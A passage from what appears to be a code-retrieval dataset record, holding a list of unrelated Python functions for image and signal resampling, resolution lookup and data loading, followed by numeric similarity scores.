f'{self._directory_root}/nss_points.sdf'\n nss = gaps_util.read_pts_file(nss_sample_path)\n # log.info(f'The points have shape {nss.shape}')\n else:\n nss = self._archive['axis_samples']\n self._near_surface_samples = np.reshape(nss,\n [100000, 4]).astype(np.float32)\n return self._near_surface_samples", "def preprocess(self, data):\n data_unnorm = data / 2.0 + 0.5\n \n if self.permute == 1:\n permute = [2, 1, 0]\n data_rgb_unnorm = data_unnorm[:, permute]\n elif self.permute == 0:\n data_rgb_unnorm = data_unnorm\n \n data_rgb_unnorm = F.upsample(data_rgb_unnorm, size=self.size, mode='bilinear')\n data_rgb = (data_rgb_unnorm - self.normalize_mean) / self.normalize_std\n return data_rgb", "def regrid_lowmemory(sourceimage,targetimage,fillval = NAN,theader = 0):\n # Start timer\n start = time.time()\n # Load in source data and header information\n sdata,sheader = fits.getdata(sourceimage,header = True)\n # Create WCS object for the source image\n sourcewcs = wcs.WCS(sheader)\n # Create array of pixel indices in source image\n x = arange(sdata.shape[1])\n y = arange(sdata.shape[0])\n # Interpolate the image data over pixel indices\n interp = scipy.interpolate.RectBivariateSpline(y,x,sdata)\n # Load in target grid data\n if theader == 0:\n tdata,theader = fits.getdata(targetimage,header=True)\n if theader != 0:\n tdata = fits.getdata(targetimage)\n # Create WCS object for target grid\n targetwcs = wcs.WCS(theader)\n # Create all possible pairs of pixel coordinates in target grid\n coords = cartesian([arange(tdata.shape[1]),arange(tdata.shape[0])])\n # Extract x and y columns of pixel pairs\n xpixs = coords[:,0]\n ypixs= coords[:,1]\n # Convert target grid pixels to ra/dec \n world = targetwcs.wcs_pix2world(coords,0)\n # Convert target grid ra/dec to source pixel coordinates\n dpix = sourcewcs.wcs_world2pix(world,0)\n # Extract x and y columns of converted pixel pairs\n xdpixs = dpix[:,0]\n ydpixs = dpix[:,1]\n # Find where target grid corresponds to actual source image data\n good = where((xdpixs >= min(x)) & (xdpixs <= max(x)) & (ydpixs >= min(y)) & (ydpixs <= max(y)))\n # Pick out only pixels with relevant image data\n xpixs = xpixs[good]\n ypixs = ypixs[good]\n xdpixs = xdpixs[good]\n ydpixs = ydpixs[good]\n # Create grid to fill up with source image regrid\n 
tofill = copy(tdata)\n tofill[:] = fillval\n # Loop over relevant pixels and fill up source image regrid\n for i in range(len(ypixs)):\n ypix = ypixs[i]\n xpix = xpixs[i]\n xdpix = xdpixs[i]\n ydpix = ydpixs[i]\n tofill[ypix,xpix] = interp(ydpix,xdpix)\n # End timer\n end = time.time()\n # Print time to run\n print 'Regridded in ',(end-start)/60.,' min'\n return tofill,tdata", "def check_dataset(*, low_path: str, high_path: str, count: int = 1):\n with open(high_path, \"rb\") as s_file:\n src_data: np.array = np.load(s_file)\n\n with open(low_path, \"rb\") as s_file:\n res_data: np.array = np.load(s_file)\n\n assert src_data.shape == res_data.shape\n n, m = res_data.shape\n core_size = int(np.sqrt(m / LAYERS))\n assert core_size ** 2 * LAYERS == m\n k = core_size * 4\n\n for _ in range(count):\n img = np.zeros(\n (core_size, k, LAYERS), dtype=res_data.dtype\n )\n i = random.randint(0, n)\n res_row = res_data[i]\n src_row = src_data[i]\n\n mask = create_percent_diff(src_row, res_row)\n restored_src = apply_diff(res_row, mask)\n for l_i, layer_mask in enumerate(np.reshape(mask, (LAYERS, core_size, core_size))): # noqa\n print(f\"layer {l_i} mask:\")\n for row in layer_mask:\n print(\",\".join(map(\"{: >3}\".format, row)))\n\n nopy_restore_area(\n img[:, 0:core_size, :], src_row, core_size, LAYERS\n )\n nopy_restore_area(\n img[:, core_size:core_size * 2, :], res_row, core_size, LAYERS\n )\n nopy_restore_area(\n img[:, core_size * 2:core_size * 3, :], mask, core_size, LAYERS\n )\n nopy_restore_area(\n img[:, core_size * 3:k, :], restored_src, core_size, LAYERS\n )\n plt.imshow(Image.fromarray(img))\n plt.show(block=True)", "def test_get_image(self):\n\n spine_data_loader = SpineDataLoader(dirpath_data=self.dirpath,\n batch_size=4)\n\n for idx in range(4):\n image = spine_data_loader.get_image(str(idx))\n assert image.shape == (256, 256, 1)\n assert image.min() == 0.0\n assert image.max() == 1.0\n assert image.dtype == 'float64'", "def UResolution(self, *args):\n return _Adaptor3d.Adaptor3d_Surface_UResolution(self, *args)", "def __init__(self, data_source, batch_size):\n self.batch_size = batch_size\n self.samples_per_row = ceil(len(data_source) / batch_size)\n self.num_samples = self.samples_per_row * batch_size", "def adjust_image_data(self):\r\n\r\n print('Adjusting image data: ')\r\n\r\n if self.removeFirstSequence: # used to remove the first trial from the sequence\r\n\r\n frames_per_rep = self.nFrames/self.nrepetitions\r\n\r\n self.imageData = self.imageData[frames_per_rep:, :, :]\r\n\r\n self.nFrames = self.imageData.shape[0]\r\n\r\n self.nrepetitions = int(self.nFrames/(self.period * self.framerate))\r\n\r\n self.times = np.arange(0, self.nFrames/self.framerate, 1.0/self.framerate)\r\n\r\n \r\n\r\n # first squeeze the image to 3d if it is 4d\r\n\r\n maxt = np.max(self.times) # find last image time\r\n\r\n sh = self.imageData.shape\r\n\r\n if len(sh) == 4:\r\n\r\n self.imageData = self.imageData.squeeze()\r\n\r\n sh = self.imageData.shape\r\n\r\n dt = np.mean(np.diff(self.times)) # get the mean dt\r\n\r\n n_Periods = int((maxt+dt)/self.period) # how many full periods in the image set - include the first?\r\n\r\n if self.nrepetitions > 0 and self.nrepetitions < n_Periods:\r\n\r\n n_Periods = self.nrepetitions\r\n\r\n n_PtsPerCycle = int(np.floor(self.period/dt)); # estimate image points in a stimulus cycle\r\n\r\n ndt = self.period/n_PtsPerCycle\r\n\r\n self.imageData = self.imageData[range(0, n_Periods*n_PtsPerCycle),:,:] # reduce to only what we need\r\n\r\n print (' Adjusted image 
info')\r\n\r\n print (\" # Periods: %d Pts/cycle: %d Cycle dt %8.4fs (%8.3fHz) Cycle: %7.4fs\" %(n_Periods, n_PtsPerCycle, ndt, 1.0/ndt, self.period))\r\n\r\n self.print_image_info()", "def downsample_sam(self, factor):", "def test_oss_fit_sample():\n\n # Resample the data\n oss = OneSidedSelection(random_state=RND_SEED)\n X_resampled, y_resampled = oss.fit_sample(X, Y)\n\n currdir = os.path.dirname(os.path.abspath(__file__))\n X_gt = np.load(os.path.join(currdir, 'data', 'oss_x.npy'))\n y_gt = np.load(os.path.join(currdir, 'data', 'oss_y.npy'))\n assert_array_equal(X_resampled, X_gt)\n assert_array_equal(y_resampled, y_gt)", "def lensedImage(self, source, scale, xl=8., yl=4., gamma=0.):\n image, magMap = lens(self.ltype, self.dist, source, self.x01, self.x02, xl, yl, gamma)\n\n return image, magMap", "def change_resolution(self):", "def getResolution(self):\n return self.resolution", "def resolution(self):\n return next(iter(self.resolutions()), None)", "def __call__(self, src, label, mask):\n # resize shorter side but keep in max_size\n h, _, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n im_scale = float(img.shape[0]) / h\n\n img = vf.to_tensor(img)\n img = vf.normalize(img, mean=self._mean, std=self._std)\n return img, torch.tensor([img.shape[-2], img.shape[-1], im_scale], dtype=torch.float32)", "def _default_sampling_xrange(self):\n from scipy.stats import rv_continuous\n dataset = self.rvdist.rvs(1000) if rv_continuous in self.rvdist.__class__.__mro__ \\\n else self.rvdist.dataset\n scale = np.nanmax(dataset) - np.nanmin(dataset)\n return [np.nanmin(dataset) - scale*0.05, np.nanmax(dataset) + scale*0.05]", "def get_data(name):\n\n if name == 'train' or name == 'unlabeled':\n return np.expand_dims(np.load(os.path.join(DATADIR, 'source_d10_train_X.npy')), axis=-1), \\\n np.argmax(np.load(os.path.join(DATADIR, 'source_d10_train_y.npy')), axis=1)\n # custom svhn has only training/validation set\n elif name == 'validation' or name == 'val':\n return np.expand_dims(np.load(os.path.join(DATADIR, 'source_d10_val_X.npy')), axis=-1), \\\n np.argmax(np.load(os.path.join(DATADIR, 'source_d10_val_y.npy')), axis=1)", "def get_resolution(ds):\n\n if 'x' in ds.coords and 'y' in ds.coords:\n x = ds.coords['x'].values\n y = ds.coords['y'].values\n resx = abs(x[-1] - x[0]) / (len(x) - 1)\n resy = abs(y[-1] - y[0]) / (len(y) - 1)\n return (resx, resy)\n else:\n transform = get_transform(ds)\n if transform is not None:\n return (abs(transform.a), abs(transform.e))\n elif 'res' in ds.attrs:\n return ds.attrs['res']\n\n return None", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 0] * self.scale", "def _compute_raw_image_norm(self):\n return np.sum(self._data, dtype=float)", "def __call__(self, src, label):\n # resize shorter side but keep in max_size\n h, w, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))\n im_scale = h / float(img.shape[0])\n\n img = vf.to_tensor(img)\n img = vf.normalize(img, mean=self._mean, std=self._std)\n return img, bbox.astype('float32'), torch.tensor([im_scale], dtype=torch.float32)", "def resample_img(image, target_shape, mode='nearest'):\n print(target_shape)\n resize_factor = np.array(target_shape)/image.shape\n resampled = scipy.ndimage.interpolation.zoom(image, 
resize_factor,\n mode=mode)\n return resampled", "def test_copy_sources(self):\n metric_copy = copy_metric(self.metric, self.DATA_MODEL)\n self.assertEqual(\"Source\", first(metric_copy[\"sources\"].values())[\"name\"])", "def _number_of_samples(self):\n return len(self._raw_data.samples)", "def resample(self):\n self.variational_strategy.resample()", "def test_nib_resample_image_3d_to_dest(fake_3dimage_nib, fake_3dimage_nib_big):\n img_r = resampling.resample_nib(fake_3dimage_nib, image_dest=fake_3dimage_nib_big, interpolation='linear')\n assert img_r.get_data().shape == (29, 39, 19)\n assert img_r.get_data()[4, 4, 4] == 1.0", "def quality_data(self, s):\n known_symbols = np.mod(range(176),48)>=32\n print('quality_data',np.sum(np.real(s[known_symbols])<0))\n success = np.sum(np.real(s[known_symbols])<0) < 20\n return success,0 ## no doppler estimate for data frames", "def oversampling(self):\n return self._oversampling", "def get_image(self):\n if self._image is None:\n image_data = np.load(self.image_file)\n if not isinstance(image_data, np.ndarray):\n image_data = image_data['arr_0']\n self.meta_data = ImageWrapper.load_metadata(self.image_file+\".meta\")\n exposure_time = self.meta_data['exposure_time_us'] * 1e-6\n dark_level = float(self.meta_data['black_level'])\n # saturation_mask = image_data.max(axis=2) >= 4094\n image_data = np.clip((image_data.astype(np.float32) - dark_level),\n a_min=0.0, a_max=None) / exposure_time\n if self.original_vignetting is not None:\n image_data = image_data / self.original_vignetting\n if self.crop is not None:\n image_data = image_data[\n self.crop[1,0]:self.crop[1,1],\n self.crop[0,0]:self.crop[0,1]\n ]\n # saturation_mask = saturation_mask[\n # self.crop[1,0]:self.crop[1,1],\n # self.crop[0,0]:self.crop[0,1]\n # ]\n if self.down_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=1./self.down_sample,\n fy=1./self.down_sample,\n interpolation=cv2.INTER_AREA\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=1./self.down_sample,\n # fy=1./self.down_sample,\n # interpolation=cv2.INTER_AREA\n # )\n if self.reup_sample is not None:\n image_data = cv2.resize(\n image_data,\n dsize=None,\n fx=self.reup_sample,\n fy=self.reup_sample,\n interpolation=cv2.INTER_CUBIC\n )\n # saturation_mask = cv2.resize(\n # saturation_mask,\n # dsize=None,\n # fx=self.reup_sample,\n # fy=self.reup_sample,\n # interpolation=cv2.INTER_CUBIC\n # )\n image = torch.tensor(np.transpose(image_data, (2,0,1)), dtype=torch.float32, device=self.device)\n # saturation_mask = torch.tensor(saturation_mask, dtype=torch.float32, device=self.device)\n if not self.lazy:\n self._image = image\n # self._saturation_mask = saturation_mask\n else:\n image = self._image\n # saturation_mask = self._saturation_mask\n\n return image#, saturation_mask", "def merge(sources, bounds=None, res=None, nodata=None, precision=7):\n first = sources[0]\n first_res = first.res\n nodataval = first.nodatavals[0]\n dtype = first.dtypes[0]\n\n # Extent from option or extent of all inputs.\n if bounds:\n dst_w, dst_s, dst_e, dst_n = bounds\n else:\n # scan input files.\n xs = []\n ys = []\n for src in sources:\n left, bottom, right, top = src.bounds\n xs.extend([left, right])\n ys.extend([bottom, top])\n dst_w, dst_s, dst_e, dst_n = min(xs), min(ys), max(xs), max(ys)\n\n logger.debug(\"Output bounds: %r\", (dst_w, dst_s, dst_e, dst_n))\n output_transform = Affine.translation(dst_w, dst_n)\n logger.debug(\"Output transform, before scaling: %r\", 
output_transform)\n\n # Resolution/pixel size.\n if not res:\n res = first_res\n elif not np.iterable(res):\n res = (res, res)\n elif len(res) == 1:\n res = (res[0], res[0])\n output_transform *= Affine.scale(res[0], -res[1])\n logger.debug(\"Output transform, after scaling: %r\", output_transform)\n\n # Compute output array shape. We guarantee it will cover the output\n # bounds completely.\n output_width = int(math.ceil((dst_e - dst_w) / res[0]))\n output_height = int(math.ceil((dst_n - dst_s) / res[1]))\n\n # Adjust bounds to fit.\n dst_e, dst_s = output_transform * (output_width, output_height)\n logger.debug(\"Output width: %d, height: %d\", output_width, output_height)\n logger.debug(\"Adjusted bounds: %r\", (dst_w, dst_s, dst_e, dst_n))\n\n # create destination array\n dest = np.zeros((first.count, output_height, output_width), dtype=dtype)\n\n if nodata is not None:\n nodataval = nodata\n logger.debug(\"Set nodataval: %r\", nodataval)\n\n if nodataval is not None:\n # Only fill if the nodataval is within dtype's range.\n inrange = False\n if np.dtype(dtype).kind in ('i', 'u'):\n info = np.iinfo(dtype)\n inrange = (info.min <= nodataval <= info.max)\n elif np.dtype(dtype).kind == 'f':\n info = np.finfo(dtype)\n inrange = (info.min <= nodataval <= info.max)\n if inrange:\n dest.fill(nodataval)\n else:\n warnings.warn(\n \"Input file's nodata value, %s, is beyond the valid \"\n \"range of its data type, %s. Consider overriding it \"\n \"using the --nodata option for better results.\" % (\n nodataval, dtype))\n else:\n nodataval = 0\n\n for src in sources:\n # Real World (tm) use of boundless reads.\n # This approach uses the maximum amount of memory to solve the problem.\n # Making it more efficient is a TODO.\n\n # 1. Compute spatial intersection of destination and source.\n src_w, src_s, src_e, src_n = src.bounds\n\n int_w = src_w if src_w > dst_w else dst_w\n int_s = src_s if src_s > dst_s else dst_s\n int_e = src_e if src_e < dst_e else dst_e\n int_n = src_n if src_n < dst_n else dst_n\n\n # 2. Compute the source window.\n src_window = get_window(\n int_w, int_s, int_e, int_n, src.affine, precision=precision)\n logger.debug(\"Src %s window: %r\", src.name, src_window)\n\n # 3. Compute the destination window.\n dst_window = get_window(\n int_w, int_s, int_e, int_n, output_transform, precision=precision)\n logger.debug(\"Dst window: %r\", dst_window)\n\n # 4. Initialize temp array.\n tcount = first.count\n trows, tcols = tuple(b - a for a, b in dst_window)\n\n temp_shape = (tcount, trows, tcols)\n logger.debug(\"Temp shape: %r\", temp_shape)\n\n temp = np.zeros(temp_shape, dtype=dtype)\n temp = src.read(out=temp, window=src_window, boundless=False,\n masked=True)\n\n # 5. 
Copy elements of temp into dest.\n roff, coff = dst_window[0][0], dst_window[1][0]\n\n region = dest[:, roff:roff + trows, coff:coff + tcols]\n np.copyto(\n region, temp,\n where=np.logical_and(region == nodataval, temp.mask == False))\n\n return dest, output_transform", "def set_data_shape(self):\n # 如果分辨率是 1000 米\n if self.resolution == 1000:\n satellite_type = ['AQUA', 'TERRA']\n if self.satellite in satellite_type:\n try:\n h4File = SD(self.in_file, SDC.READ)\n in_data_r250 = h4File.select('EV_250_Aggr1km_RefSB').get()\n self.data_shape = in_data_r250.shape[1:]\n except Exception as e:\n print(e)\n else:\n raise ValueError(\n 'Cant read this satellite`s data.: {}'.format(self.satellite))\n else:\n raise ValueError(\n \"Cant handle this resolution: \".format(self.resolution))", "def normalize_sample(sample_data):\n BASE = 255\n sample_data = np.array(sample_data, dtype='float32')\n return sample_data/BASE", "def minimum_sampling(self):\n return self.fwhm/2.", "def getDimensions():", "def downsampling(inp_img):\n\n\n img = np.array(inp_img)\n f = max(1, np.rint(np.amin(img)/256))\n\n if f > 1:\n lpf = np.ones((f, f))\n f = (1/(f*f))*lpf\n img = cv2.filter2D(img, -1, kernel=f)\n out = np.hstack((img[:, :, 0], img[:, :, 1], img[:, :, 2]))\n\n return out", "def test_full_resize(self):\n number_of_pixels = 300\n destination = base_path +'/test_data/rendering_tests/resized_images/'\n source_folder = base_path + '/test_data/rendering_tests/filter_database/'\n\n\n for the_file in os.listdir(destination):\n file_path = os.path.join(destination, the_file)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n\n\n self.assertEqual(0, len(os.listdir(destination)))\n rb.find_all_files(number_of_pixels,source_folder, destination)\n self.assertEqual(6, len(os.listdir(destination)))\n for the_file in os.listdir(destination):\n file_path = os.path.join(destination,the_file)\n with Image.open(file_path) as f:\n self.assertNotEqual(number_of_pixels+5, f.size[0])\n self.assertNotEqual(number_of_pixels+5, f.size[1])\n # the above checks that the size does not vary as needed\n # probably not necessary\n self.assertEqual(number_of_pixels, f.size[0])\n self.assertEqual(number_of_pixels, f.size[1])", "def source_freq(self) -> int:", "def prepare(dataset):\n dataset = dataset.reshape(dataset.shape[0], 1, 28, 28)\n dataset = dataset.astype('float32')\n dataset /= 255\n return dataset", "def test_calc_res():\n with xr.open_rasterio(TEST_RASTER_PATH) as src:\n xr_res = ds.utils.calc_res(src)\n with rasterio.open(TEST_RASTER_PATH) as src:\n rio_res = src.res\n assert np.allclose(xr_res, rio_res)", "def resample(self, data_arr):\n data_arr = np.asarray(data_arr, dtype=np.float32, order='C')\n check_audio(data_arr, is_mono=False)\n\n fn = self._lib['resampleObj_resample']\n fn.argtypes = [POINTER(OpaqueResample),\n np.ctypeslib.ndpointer(dtype=np.float32, ndim=1, flags='C_CONTIGUOUS'),\n c_int,\n np.ctypeslib.ndpointer(dtype=np.float32, ndim=1, flags='C_CONTIGUOUS')]\n data_len = data_arr.shape[-1]\n\n if data_arr.ndim == 1:\n ret_arr = np.zeros(data_len * 5, dtype=np.float32)\n new_arr_len = fn(self._obj, data_arr, c_int(data_len), ret_arr)\n else:\n data_arr, o_channel_shape = format_channel(data_arr, 1)\n channel_num = data_arr.shape[0]\n\n ret_arr = np.zeros((channel_num, data_len * 5), dtype=np.float32)\n new_arr_len = 0\n for i in range(channel_num):\n _new_arr_len = fn(self._obj, data_arr[i], c_int(data_len), ret_arr[i])\n new_arr_len = max(new_arr_len, _new_arr_len)\n ret_arr = revoke_channel(ret_arr, 
o_channel_shape, 1)\n\n return ret_arr[..., :new_arr_len]", "def process_image(self, image):\r\n img = cv2.imread(image)\r\n img = img.astype(float)/127 - 1\r\n return np.expand_dims(img, axis=0)", "def FindScale(self):\n\n ## 6 and from the cv code the distance is 6 then we are good\n print(\"TODO: Very hard\")", "def getUnscaledSamples(self, **kwargs) -> TimeData:\n # initialise chans, startSample and endSample with the whole dataset\n options = self.parseGetDataKeywords(kwargs)\n\n # get the files to read and the samples to take from them, in the correct order\n dataFilesToRead, samplesToRead, scalings = self.getDataFilesForSamples(\n options[\"startSample\"], options[\"endSample\"]\n )\n numSamples = options[\"endSample\"] - options[\"startSample\"] + 1\n # set up the dictionary to hold the data\n data = {}\n for chan in options[\"chans\"]:\n data[chan] = np.zeros(shape=(numSamples), dtype=self.dtype)\n\n # loop through chans and get data\n sampleCounter = 0\n for dFile, sToRead, scalar in zip(dataFilesToRead, samplesToRead, scalings):\n # get samples - this is inclusive\n dSamples = sToRead[1] - sToRead[0] + 1\n # spam files always record 5 channels\n dSamplesRead = dSamples * self.recChannels[dFile]\n # read the data\n byteOff = (\n self.dataByteOffset[dFile]\n + sToRead[0] * self.recChannels[dFile] * self.dataByteSize\n )\n dFilePath = os.path.join(self.dataPath, dFile)\n dataRead = np.memmap(\n dFilePath,\n dtype=self.dtype,\n mode=\"r\",\n offset=byteOff,\n shape=(dSamplesRead),\n )\n # now need to unpack this\n for chan in options[\"chans\"]:\n # check to make sure channel exists\n self.checkChan(chan)\n # get the channel index - the chanIndex should give the right order in the data file\n # as it is the same order as in the header file\n chanIndex = self.chanMap[chan]\n # use the range sampleCounter -> sampleCounter + dSamples, because this actually means sampleCounter + dSamples - 1 as python ranges are not inclusive of the end value\n # scale by the lsb scalar here - note that these can be different for each file in the run\n data[chan][sampleCounter : sampleCounter + dSamples] = (\n dataRead[chanIndex : dSamplesRead : self.recChannels[dFile]]\n * scalar[chan]\n )\n # increment sample counter\n sampleCounter = sampleCounter + dSamples # get ready for the next data read\n\n # return data\n startTime, stopTime = self.sample2time(\n options[\"startSample\"], options[\"endSample\"]\n )\n comments = []\n comments.append(\n \"Unscaled data {} to {} read in from measurement {}, samples {} to {}\".format(\n startTime,\n stopTime,\n self.dataPath,\n options[\"startSample\"],\n options[\"endSample\"],\n )\n )\n comments.append(\"Data read from {} files in total\".format(len(dataFilesToRead)))\n comments.append(\n \"Data scaled to mV for all channels using scalings in header files\"\n )\n comments.append(\"Sampling frequency {}\".format(self.getSampleFreq()))\n return TimeData(\n sampleFreq=self.getSampleFreq(),\n startTime=startTime,\n stopTime=stopTime,\n data=data,\n comments=comments,\n )", "def resize(data, data_type, interpolation_method, target_height, target_width):\r\n if target_width == data.shape[1] and target_height == data.shape[0]:\r\n return data\r\n\r\n if data_type == 'stereo':\r\n # disparity map\r\n if interpolation_method == 'bilinear':\r\n result = util_cython.resize(data, target_width, target_height, 0.5)\r\n else:\r\n result = cv2.resize(data, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\r\n else:\r\n # optical flow field\r\n result = 
np.zeros((target_height, target_width, 2))\r\n if interpolation_method == 'bilinear':\r\n result[:, :, 0] = util_cython.resize(data[:, :, 0], target_width, target_height, 0.5)\r\n result[:, :, 1] = util_cython.resize(data[:, :, 1], target_width, target_height, 0.5)\r\n else:\r\n result = cv2.resize(data, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\r\n return result", "def query_frame(self):\n x, y = N.ogrid[0:self._resolution[1], 0:self._resolution[0]]\n x0, y0 = int(self._resolution[1] / 2), int(self._resolution[0] / 2)\n r = N.hypot(x - x0, y - y0)\n w0 = 75.0\n self.frame = N.array(N.exp(-r ** 2 / w0 ** 2) * 60000, dtype=N.uint16)\n self.frame += N.random.uniform(low=0, high=5535, size=self._resolution[::-1])", "def resample(self, data):\n # Resample signal\n if self._fs_out != self._fs_in:\n\n # Check that new sample rate is compatable with batch size\n if self._next_frame_idx != 0:\n raise ValueError('New sample rate incompatable with batch size.')\n\n # Input dimensions\n frames_in = data.shape[0] # samples\n len_data = float(frames_in) / self._fs_in # seconds\n\n # Output dimensions\n frames_out = int(np.round(len_data*self._fs_out)) # samples\n delta_out = 1.0 / self._fs_out # seconds\n\n # Predict next frame\n self._next_frame_idx = int(np.round(frames_out*delta_out*self._fs_in)) - \\\n frames_in\n\n # Compute indices to output\n idx_out = np.round(np.arange(frames_out)*delta_out*self._fs_in)\n\n # Sample data using output indices\n data_out = np.zeros((frames_out, data.shape[1]))\n for i in range(frames_out):\n idx = min(frames_in - 1, idx_out[i])\n data_out[i, :] = data[int(idx), :]\n\n else:\n\n # No resampling\n data_out = data\n\n return data_out", "def resample(image, flow):\r\n assert flow.shape[1] == 2\r\n b, c, h, w = image.shape\r\n grid = get_grid(b, (h, w))\r\n flow = L.concat([flow[:, 0:1, :, :] / ((w - 1.0) / 2.0),\r\n flow[:, 1:2, :, :] / ((h - 1.0) / 2.0)], 1)\r\n final_grid = L.transpose((grid + flow), (0, 2, 3, 1))\r\n image.stop_gradient = False\r\n try:\r\n output = nn.functional.grid_sample(image, final_grid, mode='bilinear', padding_mode='border', align_corners=True)\r\n except Exception:\r\n output = nn.functional.grid_sample(image, final_grid, mode='bilinear', padding_mode='border')\r\n \r\n return output\r\n # return image\r\n # return L.zeros_like(image)\r" ]
[ "0.5770578", "0.5644546", "0.56255263", "0.55761415", "0.54033136", "0.5392939", "0.536528", "0.5364385", "0.5331956", "0.5313504", "0.5307943", "0.5276826", "0.52704465", "0.52479804", "0.5238506", "0.5231732", "0.52003103", "0.517683", "0.5145478", "0.51325125", "0.51163715", "0.5104453", "0.5092835", "0.50851905", "0.5081938", "0.5079806", "0.50769687", "0.50678796", "0.5065648", "0.5063772", "0.50579244", "0.50506955", "0.50435823", "0.50368625", "0.5019365", "0.5019097", "0.5019097", "0.50190884", "0.50138164", "0.5010639", "0.5004717", "0.50035745", "0.49978384", "0.49829066", "0.49809545", "0.49789864", "0.4972913", "0.49693954", "0.49625567", "0.496158", "0.49612066", "0.49558938", "0.4953811", "0.495172", "0.49499387", "0.4943389", "0.49392447", "0.49276426", "0.49260318", "0.49247807", "0.49199995", "0.49087572", "0.4906858", "0.49059227", "0.4905121", "0.48984513", "0.48974463", "0.48934284", "0.48925644", "0.48902303", "0.488924", "0.48885387", "0.4886625", "0.48864132", "0.48849285", "0.4874222", "0.48653203", "0.48571238", "0.48525682", "0.48515457", "0.48468876", "0.48450205", "0.48409206", "0.48406142", "0.4839113", "0.48377684", "0.48320112", "0.4829218", "0.48279652", "0.48271546", "0.48214445", "0.4820808", "0.48203573", "0.48198593", "0.48190567", "0.48169672", "0.48118308", "0.48097494", "0.4806397", "0.48053595", "0.47959656" ]
0.0
-1
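Each row in this dump carries a list of candidate negative passages followed by a parallel list of scores, plus an overall score and rank for the positive document. A minimal, hypothetical sketch of consuming such a row — the field names ("negatives", "negative_scores") and the "higher score = harder negative" reading are assumptions drawn from the dump's structure, not documented facts:

    def hardest_negatives(record, k=5):
        # Pair each negative passage with its score; scores appear as strings
        # in these rows, so cast to float before ranking.
        pairs = zip(record["negatives"], record["negative_scores"])
        # Keep the k highest-scoring negatives (assumed to be the hardest ones).
        return sorted(pairs, key=lambda p: float(p[1]), reverse=True)[:k]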
Returns the (width, height) of pixels in this Dataset's units.
def GetPixelDimensions(self):
    _, width, _, _, _, height = self.GetGeoTransform()
    return XY(x=width, y=height)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dimensions (self):\n return (self.width, self.height)", "def get_size(self) -> Tuple2IntType:\n return self.get_width(), self.get_height()", "def size(self):\n return self.width, self.height", "def get_size_inches(self):\n width, height = self.figure.get_size_inches()\n bbox = self.get_position()\n width = width * abs(bbox.width)\n height = height * abs(bbox.height)\n return width, height", "def pixelSize(self):\n br = self.sceneBoundingRect()\n if self.image is None:\n return 1,1\n return br.width()/self.width(), br.height()/self.height()", "def getPixelSize(self):\n return (0.000013, 0.000013)", "def size(self) -> typing.Tuple[int, int]:\n return self.width, self.height", "def getSize(self):\n return self.__width * self.__height;", "def getSize(self):\n return (int(self.getWidth()), int(self.getHeight()))", "def get_pixel_size(self):\n raise NotImplementedError", "def size(self) -> Tuple[int, int]:\n return self._width, self._height", "def size(self) -> Tuple[int, int]:\n return (self.width, self.height)", "def size(self):\n return (self.width, self.height)", "def getDimensions():", "def size(self):\n return (self.width(), self.height())", "def size_in(self):\n return self.dimensions", "def size(self):\n return (self.width)", "def size(self):\n return (self._width, self._height)", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def px_size(self):\n xp, yp = ct.c_float(), ct.c_float()\n\n self.lib.GetPixelSize(ct.pointer(xp), ct.pointer(yp))\n\n return (xp.value, yp.value)", "def getDimensions(self):\n\ttop = self.getTop()\n\tleft = self.getLeft()\n\twidth = self.getWidth()\n\theight = self.getHeight()\n\treturn top, left, width, height", "def _size_pixels(self, renderer):\n return renderer.points_to_pixels(self.size)", "def numPixels(self):\n\t\treturn self.size", "def numPixels(self):\n\t\treturn self.size", "def getDimensions(self):\n return _libsbml.Layout_getDimensions(self)", "def resolution_pixels_xy(self):\n return np.array([self._photo_size_pixels, self._photo_size_pixels])", "def getDims(self):\n size = self.screenSize\n height = int(size.height())\n width = int(size.width())\n return height, width", "def pix_size(self):\n return self._pix_size", "def resolution(self):\n return {'x': self.width, 'y': self.height}", "def get_display_px(self):\n return self.image.size", "def _get_image_dimensions(self):\n\t\timageWidth = int(self.labels['IMAGE']['LINE_SAMPLES'])\n\t\timageHeight = int(self.labels['IMAGE']['LINES'])\n\t\treturn imageWidth, imageHeight", "def get_dim():\n return (Settings.width, Settings.height)", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def size(self):\n return self.width", "def dimension(self) -> float:\n return self._dimensions", "def shape(self) -> tuple[int, int]:\n return self.height, self.width", "def get_data_dimensions(self):\n return image_utils.convert_shape_indexing(self._get_data_dimensions_rc(),\"rc\",self.image_indexing)", "def size_out(self):\n return self.dimensions", "def size(self) -> (float, float):\n\n return self.screen.get_surface().get_size()", "def get_pixel_size(self):\n p0 = core.PointF(0, 0)\n p1 = 
